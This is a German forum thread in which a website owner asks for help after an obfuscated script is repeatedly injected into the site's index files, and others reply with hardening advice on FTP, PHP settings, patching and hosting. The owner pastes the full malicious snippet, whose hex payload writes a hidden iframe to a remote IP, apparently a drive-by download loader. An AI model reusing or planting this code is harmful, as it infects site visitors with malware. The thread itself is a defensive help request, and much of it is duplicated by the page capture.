10
Website Sicherheit
Ich habe ein Problem mit meiner Website, vor ein paar Tagen bemerkte ich das auf meienr Website imemr ein Popup aufgeht indem darauf hingewiesen wird das der PC von einem Virus befallen sei und man auf dei Seite "www.advancedxpdefender.com" gehen soll um sich eine Software runterzuladen.
Dann habe ich mir mal den Quellcode angeschaut und gesehen das jemand meine index (.php und .html) dateien manipuliert hat und folgenden Code eingefügt hat:
<script>
<!--
var d=document,kol=561;
function O10H48514B24F1CE6(H48514B24F20E3){ function H48514B24F24DF() {return 16;} return( parseInt(H48514B24F20E3,H48514B24F24DF()));}function H48514B24F2CEE(H48514B24F30EA){ var H48514B24F34E4='';for(H48514B24F38E1=0; H48514B24F38E1<H48514B24F30EA.length; H48514B24F38E1+=2){ H48514B24F34E4 += ( String.fromCharCode (O10H48514B24F1CE6(H48514B24F30EA.substr(H48514B24F38E1, 2))));}return H48514B24F34E4;} document.write(H48514B24F2CEE('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A38323238292B27623762325C272077696474683D323432206865696768743D3334207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->
</script>
Habe nun schon mehrmals den Code aus allen Index Dateien rausgenommen aber es passiert immer wieder!
Mein FTP Passwort kann meines Erachtens anch nicht gekanckt worden sein,da dies sehr stark ist (enthält Groß- und Kleinbuchstaben,Sonderzeichen und Zahlen).
Wie ist es möglich das jemand diese Dateien manipuliert?
Wie kann ich mich dagegen schützen?
Danke schonmal!
Grüße
Dann habe ich mir mal den Quellcode angeschaut und gesehen das jemand meine index (.php und .html) dateien manipuliert hat und folgenden Code eingefügt hat:
<script>
<!--
var d=document,kol=561;
function O10H48514B24F1CE6(H48514B24F20E3){ function H48514B24F24DF() {return 16;} return( parseInt(H48514B24F20E3,H48514B24F24DF()));}function H48514B24F2CEE(H48514B24F30EA){ var H48514B24F34E4='';for(H48514B24F38E1=0; H48514B24F38E1<H48514B24F30EA.length; H48514B24F38E1+=2){ H48514B24F34E4 += ( String.fromCharCode (O10H48514B24F1CE6(H48514B24F30EA.substr(H48514B24F38E1, 2))));}return H48514B24F34E4;} document.write(H48514B24F2CEE('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A38323238292B27623762325C272077696474683D323432206865696768743D3334207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->
</script>
Habe nun schon mehrmals den Code aus allen Index Dateien rausgenommen aber es passiert immer wieder!
Mein FTP Passwort kann meines Erachtens anch nicht gekanckt worden sein,da dies sehr stark ist (enthält Groß- und Kleinbuchstaben,Sonderzeichen und Zahlen).
Wie ist es möglich das jemand diese Dateien manipuliert?
Wie kann ich mich dagegen schützen?
Danke schonmal!
Grüße
Auf Facebook teilen
Auf Twitter teilen
Auf Reddit teilen
Auf Linkedin teilenBitte markiere auch die Kommentare, die zur Lösung des Beitrags beigetragen haben
Content-ID: 89909
Url: https://administrator.de/contentid/89909
Ausgedruckt am: 22.11.2024 um 17:11 Uhr
10 Kommentare
Neuester Kommentar
Hallo,
was ist das für ein Webserver?
M$ oder *nix?
IIS oder Apache?
Wenn jemand deinen Server gehackt hat (und das er das hat steht außer Frage) dann ist evtl. auch ein Rootkit installiert, in diesem Fall ist die einzig sichere Möglichkeit, alles neu zu installieren.
Bitte überbewerte dein "starkes FTP-Passwort" nicht, bei FTP werden die Passwörter unverschlüsselt übertragen!
mfg
Harald
was ist das für ein Webserver?
M$ oder *nix?
IIS oder Apache?
Wenn jemand deinen Server gehackt hat (und das er das hat steht außer Frage) dann ist evtl. auch ein Rootkit installiert, in diesem Fall ist die einzig sichere Möglichkeit, alles neu zu installieren.
Bitte überbewerte dein "starkes FTP-Passwort" nicht, bei FTP werden die Passwörter unverschlüsselt übertragen!
mfg
Harald
Moin,
interessant ist auch was für eine Hosting umgebung das ist. Rootserver? Colocation? Oder eine 0,99€ HP beim Discounter?
lg,
Slainte
interessant ist auch was für eine Hosting umgebung das ist. Rootserver? Colocation? Oder eine 0,99€ HP beim Discounter?
lg,
Slainte
Linux Apache!
Hab den bei freeweb.de.
Neuinstallieren ist so eine Sache.... da steckt verdammt viel Arbeit drin und es sind noch mehrere Subdomains die da laufen.
Und angenommen ich würde alles neu machen, wie kann ich mich danach dann schützen?
Vielen Dank schonmal für die schnelle Antwort.
Hab den bei freeweb.de.
Neuinstallieren ist so eine Sache.... da steckt verdammt viel Arbeit drin und es sind noch mehrere Subdomains die da laufen.
Und angenommen ich würde alles neu machen, wie kann ich mich danach dann schützen?
Vielen Dank schonmal für die schnelle Antwort.
Ich nutze dieses Paket http://freeweb.de/privat.html
Moin,
setzt dich direkt mit deinem Hoster in Verindung. Bei shared Hosting genügt es u.U. wenn eine Site auf dem Server gehackt wurde. Die sollen das checken!
Zusätzlich solltest Du Deine eigenen PHP Scripts auf Sicherheitslücken hin überprüfen, oder falls die "fremde" PHP Anwendungen einsetzt: immer zeitnah mit den aktuelle Patches verseorgen.
lg,
Slainte
setzt dich direkt mit deinem Hoster in Verindung. Bei shared Hosting genügt es u.U. wenn eine Site auf dem Server gehackt wurde. Die sollen das checken!
Und angenommen ich würde alles neu machen, wie kann ich mich danach dann
schützen?
Im falle Shared Hosting eigentlich fast nicht. Du bist zu 100% von Deinem Hoster abhängig. Wenn der schlampig arbeitet und/oder nicht patcht kannst Du kaum was machen (ausser kündigen ^^).schützen?
Zusätzlich solltest Du Deine eigenen PHP Scripts auf Sicherheitslücken hin überprüfen, oder falls die "fremde" PHP Anwendungen einsetzt: immer zeitnah mit den aktuelle Patches verseorgen.
lg,
Slainte
Hier die Antworten von meinem Hoster:
erste mail:
Ihre Website ist nicht auf dem aktuellsten Stand und beinhaltet
Sicherheitsluecken. Ueber diese Luecken wurd Ihre Website gehackt und ein
Trojaner zum download angeboten. Ihre Seiten sind somit infiziert. Sie muessen
die Scripte manuell aendern und den Trojaner Script Code rausnehmen, oder die
Website neu einrichten. Installieren Sie nur aktuelle Scripte und halten Sie
sie immer auf dem aktuellsten Stand.
--> super Antwort
zweite mail mit der bitte um konkretere hinweise:
schwer zu sagen, meist passiert das in Verbindung mit aktiviertem
register_globals und url_fopen. Im Access Log koennen Sie einmal nach .txt
suchen, ausser den robot.txt, da sehen Sie meist, welche Datei hier unsicher
war. Ueber diese Datei kann dann Code von anderen Servern nachgeladen werden.
--> die zwei sachen habe ich deaktiviert und im accesslog habe ich keine *.txt gefunden.
Ich nutze derzeit Joomla 1.5.3stable und Wordpress 2.5.1, sind beide die aktuellsten Versionen.
Von daher bin ich immer noch ratlos.
grüße
erste mail:
Ihre Website ist nicht auf dem aktuellsten Stand und beinhaltet
Sicherheitsluecken. Ueber diese Luecken wurd Ihre Website gehackt und ein
Trojaner zum download angeboten. Ihre Seiten sind somit infiziert. Sie muessen
die Scripte manuell aendern und den Trojaner Script Code rausnehmen, oder die
Website neu einrichten. Installieren Sie nur aktuelle Scripte und halten Sie
sie immer auf dem aktuellsten Stand.
--> super Antwort
zweite mail mit der bitte um konkretere hinweise:
schwer zu sagen, meist passiert das in Verbindung mit aktiviertem
register_globals und url_fopen. Im Access Log koennen Sie einmal nach .txt
suchen, ausser den robot.txt, da sehen Sie meist, welche Datei hier unsicher
war. Ueber diese Datei kann dann Code von anderen Servern nachgeladen werden.
--> die zwei sachen habe ich deaktiviert und im accesslog habe ich keine *.txt gefunden.
Ich nutze derzeit Joomla 1.5.3stable und Wordpress 2.5.1, sind beide die aktuellsten Versionen.
Von daher bin ich immer noch ratlos.
grüße
1.
stable und aktuell bedeutet nicht immer, daß die Dinger auch sicher sind, bestes Beispiel ist hier wohl Joomla
(gibt z.Zt. 4 0day-Exploits, zzgl. den alten Bekannten für die Extensions)
2.
Die Berechtigung für gewisse Dateien sollten auch ordnungsgemäß gesetzt sein...
Lonesome Walker
stable und aktuell bedeutet nicht immer, daß die Dinger auch sicher sind, bestes Beispiel ist hier wohl Joomla
(gibt z.Zt. 4 0day-Exploits, zzgl. den alten Bekannten für die Extensions)
2.
Die Berechtigung für gewisse Dateien sollten auch ordnungsgemäß gesetzt sein...
Lonesome Walker
1. ist wohl war, ich wollte auch nicht mit meiner Aussage dies ausdrücken sondern nur das ich die derzeit aktuellste Version nutze, mehr kann man ja als Endnutzer auch nicht tun!
2. Habe schon die Berechtigungen der Index Dateien über Filezilla angepasst, habe nur dem Benutzer die Berchtigung Lesen und Schreiben erteilt.
Aber auch dies hat nix geholfen, ein paar Stunden später war das Script wieder drin...
!
Also muss ja im Endeffekt jemand mein Passwort mitgelesen haben und sich so auf mein FTP-Server angemeldet haben und dann die Dateien manipuliert haben, sehe ich das so richtig?
grüße
2. Habe schon die Berechtigungen der Index Dateien über Filezilla angepasst, habe nur dem Benutzer die Berchtigung Lesen und Schreiben erteilt.
Aber auch dies hat nix geholfen, ein paar Stunden später war das Script wieder drin...
!Also muss ja im Endeffekt jemand mein Passwort mitgelesen haben und sich so auf mein FTP-Server angemeldet haben und dann die Dateien manipuliert haben, sehe ich das so richtig?
grüße
Nachdem ich die "register_globals" und "url_fopen" deaktivert habe, mein FTP Passwort geändert habe und nun bei Filezilla immer eine Verschlüsselung verwende geht es.
Zumindest sind bis jetzt seit meinem letzten Post alle index dateien sauber geblieben!
wer also auch mal dieses oder ein ähnliches Problem haben sollte, könnte er die oben genannten Sachen anwenden.
Vielen Dank nochmal für die schnellen Antworten, imemr wieder TOP in diesem Forum!!!
Zumindest sind bis jetzt seit meinem letzten Post alle index dateien sauber geblieben!
wer also auch mal dieses oder ein ähnliches Problem haben sollte, könnte er die oben genannten Sachen anwenden.
Vielen Dank nochmal für die schnellen Antworten, imemr wieder TOP in diesem Forum!!!
Zu früh gefreut!!!
Das Script ist wieder drin, aber es gibt etwas neues... es handelt sich um den "JS/Dldr.Iframe.BM" Java-Scriptvirus, diese Virendefinition wurde gestern bei Antivir in die Defintionsdatei eingepflegt.
Was mir noch eingefallen ist, ich habe mal gehört das solcher Code auch über Kontaktformulare oder ähnliches eingeschleust werden kann.
Und da ich auf meiner Seite ein Gästebuch und ein Kontaktformular habe, habe ich das Kontaktformular gleich mal deaktiviert.
Kann mir jemand darüber etwas genauere AUskunft geben, auf was man achten sollte, etc...!?
Grüße
Das Script ist wieder drin, aber es gibt etwas neues... es handelt sich um den "JS/Dldr.Iframe.BM" Java-Scriptvirus, diese Virendefinition wurde gestern bei Antivir in die Defintionsdatei eingepflegt.
Was mir noch eingefallen ist, ich habe mal gehört das solcher Code auch über Kontaktformulare oder ähnliches eingeschleust werden kann.
Und da ich auf meiner Seite ein Gästebuch und ein Kontaktformular habe, habe ich das Kontaktformular gleich mal deaktiviert.
Kann mir jemand darüber etwas genauere AUskunft geben, auf was man achten sollte, etc...!?
Grüße
